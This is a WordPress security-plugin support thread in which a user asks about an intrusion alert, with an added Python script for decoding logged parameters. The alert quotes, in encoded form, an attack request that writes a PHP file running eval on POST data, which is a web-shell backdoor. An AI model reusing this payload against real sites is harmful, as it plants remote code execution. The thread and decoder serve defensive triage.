HMWP Alert
April 18, 2016 at 2:29 pm #9037
Hi!
I just got an email alert from my HMWP plugin.
It told me that a potential attack has been detected and displays all the information below.
Is that problematic or just a security alert?
In my admin intrusions section, I got logs whose meaning I can’t understand (see attachment). Could you help me with that?
Thanks in advance!
pierre
The following potential attack has been detected by HMWP IDS. If it’s you please Exclude that parameter or increase Notify Threshold from IDS settings.
In most cases you don’t need to do anything. Hide My WP protects you!
IP: 140.117.150.103
User ID:
Date: 2016-04-18T14:02:46+00:00
Total Impact: 156
Affected tags: xss csrf sqli id lfi rfe
Affected parameters: REQUEST.1=%40ini_set%28%26quot%3Bdisplay_errors%26quot%3B%2C%26quot%3B0%26quot%3B%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho+%26%23039%3B-%26gt%3B%7C%26%23039%3B%3Bfile_put_contents%28%24_SERVER%5B%26%23039%3BDOCUMENT_ROOT%26%23039%3B%5D.%26%23039%3B%2Fwebconfig.txt.php%26%23039%3B%2Cbase64_decode%28%26%23039%3BPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%26%23039%3B%29%29%3Becho+%26%23039%3B%7C%26lt%3B-%26%23039%3B%3B, GET.1=%40ini_set%28%26quot%3Bdisplay_errors%26quot%3B%2C%26quot%3B0%26quot%3B%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho+%26%23039%3B-%26gt%3B%7C%26%23039%3B%3Bfile_put_contents%28%24_SERVER%5B%26%23039%3BDOCUMENT_ROOT%26%23039%3B%5D.%26%23039%3B%2Fwebconfig.txt.php%26%23039%3B%2Cbase64_decode%28%26%23039%3BPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%26%23039%3B%29%29%3Becho+%26%23039%3B%7C%26lt%3B-%26%23039%3B%3B,
Request URI: /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
Origin: 10.0.97.17
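To read an alert like the one above, the logged parameter can be decoded layer by layer (URL encoding, then HTML entities, then any base64 literal). This is an added example, not part of the forum post or of Hide My WP; its input is the `file_put_contents` portion of the `GET.1` value from the alert, and the names `peel` and `triage` are hypothetical.

```python
import base64
import html
import re
from urllib.parse import unquote, unquote_plus

# file_put_contents portion of the GET.1 value quoted in the alert above
ALERT_VALUE = (
    "file_put_contents%28%24_SERVER%5B%26%23039%3BDOCUMENT_ROOT%26%23039%3B%5D."
    "%26%23039%3B%2Fwebconfig.txt.php%26%23039%3B%2Cbase64_decode%28"
    "%26%23039%3BPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%26%23039%3B%29%29%3B"
)

B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
WRITE_CALL = re.compile(r"file_put_contents\(\s*(.+?)\s*,")
QUOTED = re.compile(r"['\"]([^'\"]+)['\"]")
RUNS_INPUT = re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)")


def peel(value, max_rounds=5):
    """Undo URL encoding and HTML-entity escaping until the text stops changing."""
    # '+' means space only in the outer layer; later rounds must keep a literal '+'.
    text = html.unescape(unquote_plus(value))
    for _ in range(max_rounds):
        peeled = html.unescape(unquote(text))
        if peeled == text:
            break
        text = peeled
    return text


def triage(value):
    """Summarise what a logged parameter would do if the server executed it."""
    code = peel(value)
    embedded = []
    for match in B64_CALL.finditer(code):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            embedded.append(raw.decode("utf-8", "replace"))
        except ValueError:  # not valid base64: keep the literal for review
            embedded.append(match.group(1))
    written = [QUOTED.findall(a)[-1] for a in WRITE_CALL.findall(code) if QUOTED.search(a)]
    runs = any(RUNS_INPUT.search(t) for t in [code] + embedded)
    return {"decoded": code, "written_files": written,
            "embedded": embedded, "executes_input": runs}


if __name__ == "__main__":
    print(triage(ALERT_VALUE))
```

If `written_files` is not empty, looking for that file name in the site's document root shows whether the request was stopped before anything was written.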
April 19, 2016 at 7:05 am #9049
Hi, HMWP IDS detects malicious requests coming to your site and notifies you about them. But all these requests might not be harmful, and you need not worry, as HMWP IDS will take care of this and will block the malicious requests if the Impact level is more than 20 (default value specified in HMWP IDS). You can stop receiving emails regarding this by setting the “Notification Threshold” option to 0 in the IDS Firewall tab.
Note: In case a valid request is also listed as an intrusion, hover over that request name and click on the Exclude link to add it to the exception list.
April 21, 2016 at 9:31 am #9110
Hi!
Thanks for your answer!!
Another question: I have installed the Jetpack plugin to manage the website more easily.
But lots of IDS alerts are sent.
I have allowed the IDs concerned, but it doesn’t matter, other alerts are sent.
Is there a way to give total permission to Jetpack to access the website?
Thanks again,
pierre
April 21, 2016 at 10:07 pm #9117
You can go to Dashboard >> Intrusions, then hover over the request name (that you think is valid) and click on the Exclude link to add it to the exception list.
You can also try increasing the “Block Threshold” option to about 30 under the IDS Firewall tab.